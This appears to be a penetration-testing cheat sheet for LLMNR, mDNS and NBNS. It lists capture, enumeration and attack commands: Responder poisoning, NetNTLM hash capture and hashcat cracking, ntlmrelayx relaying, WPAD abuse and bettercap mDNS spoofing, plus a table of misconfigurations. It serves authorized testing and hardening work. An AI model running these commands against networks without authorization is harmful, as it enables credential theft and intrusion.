LLMNR, mDNS and NBNS
Default Ports: 5355/UDP (LLMNR), 5353/UDP (mDNS), 137/UDP (NBNS)
LLMNR, mDNS, and NBNS are local name resolution protocols used when DNS does not answer. In internal pentests, they are common paths for name poisoning, NTLM capture, relay setup, and local service discovery.
Connect
Packet Capture
Start passively to see which names clients request.
sudo tcpdump -ni eth0 'udp port 5355 or udp port 5353 or udp port 137'
sudo tcpdump -ni eth0 -w name-resolution.pcap 'udp port 5355 or udp port 5353 or udp port 137'
Using Responder
Responder listens for name resolution requests and can answer them during authorized tests.
sudo responder -I eth0 -A
sudo responder -I eth0
Using avahi-browse
avahi-browse enumerates mDNS services on the local network.
avahi-browse -a
avahi-browse -art
Using nbtscan
nbtscan enumerates NetBIOS names and workgroups.
nbtscan 192.168.1.0/24
nbtscan -v 192.168.1.0/24
Recon
Protocol Discovery
Check whether hosts are sending local name resolution traffic.
sudo tcpdump -ni eth0 -vv 'udp port 5355 or udp port 5353 or udp port 137'
sudo tshark -i eth0 -Y 'llmnr or mdns or nbns'
Host and Name Discovery
Captured names reveal hostnames, services, shares, printers, and mistyped DNS names.
sudo responder -I eth0 -A
sudo tshark -r name-resolution.pcap -Y 'llmnr or mdns or nbns' -T fields -e ip.src -e dns.qry.name
mDNS Service Enumeration
mDNS exposes local services such as printers, AirPlay, SSH, HTTP, and IoT endpoints.
avahi-browse -art
dns-sd -B _services._dns-sd._udp local
Enumeration
LLMNR Enumeration
LLMNR requests often show Windows hosts failing DNS lookups.
sudo tcpdump -ni eth0 'udp port 5355'
sudo tshark -i eth0 -Y llmnr -T fields -e ip.src -e dns.qry.name
NBNS Enumeration
NBNS reveals NetBIOS names, domains, and legacy Windows naming.
nbtscan 192.168.1.0/24
nmap -sU -p 137 --script nbstat 192.168.1.0/24
mDNS Enumeration
mDNS enumeration maps local service advertisements.
avahi-browse -a
avahi-browse -rt _http._tcp
avahi-browse -rt _ssh._tcp
Attack Vectors
Name Poisoning
Poisoning can redirect clients to attacker-controlled services.
sudo responder -I eth0
sudo responder -I eth0 -rdw
NTLM Capture
Responder can capture NetNTLM hashes from poisoned SMB/HTTP authentication.
sudo responder -I eth0 -w -F
hashcat -m 5600 hashes.txt wordlist.txt
NTLM Relay
Captured authentication can sometimes be relayed to SMB, LDAP, or HTTP targets.
sudo responder -I eth0 --disable-ess
ntlmrelayx.py -tf targets.txt -smb2support
WPAD Abuse
WPAD names are especially valuable because clients may send proxy credentials.
sudo responder -I eth0 -w -F
ntlmrelayx.py -tf targets.txt --http-port 80
mDNS Spoofing
mDNS spoofing can impersonate local services in weakly segmented networks.
sudo bettercap -iface eth0
set mdns.spoofing true
mdns.spoof on
Post-Exploitation
Host Mapping
Use captured names to enrich internal host and service maps.
sudo tshark -r name-resolution.pcap -Y 'llmnr or mdns or nbns' -T fields -e ip.src -e dns.qry.name | sort -u
Credential Handling
Cracked or relayed credentials should be scoped and validated carefully.
hashcat -m 5600 hashes.txt wordlist.txt
netexec smb targets.txt -u user -p password
Useful Tools
| Tool | Purpose |
|---|---|
Responder | Poisoning and capture |
ntlmrelayx.py | NTLM relay |
tcpdump | Passive capture |
tshark | Packet parsing |
nbtscan | NetBIOS enumeration |
avahi-browse | mDNS enumeration |
bettercap | Local network spoofing |
Security Misconfigurations
| Misconfiguration | Risk |
|---|---|
| LLMNR enabled | Name poisoning and NTLM capture |
| NBNS enabled | Legacy poisoning and host leakage |
| WPAD fallback enabled | Proxy credential capture |
| SMB signing disabled | NTLM relay |
| mDNS exposed broadly | Local service discovery |
| Weak network segmentation | Poisoning across user groups |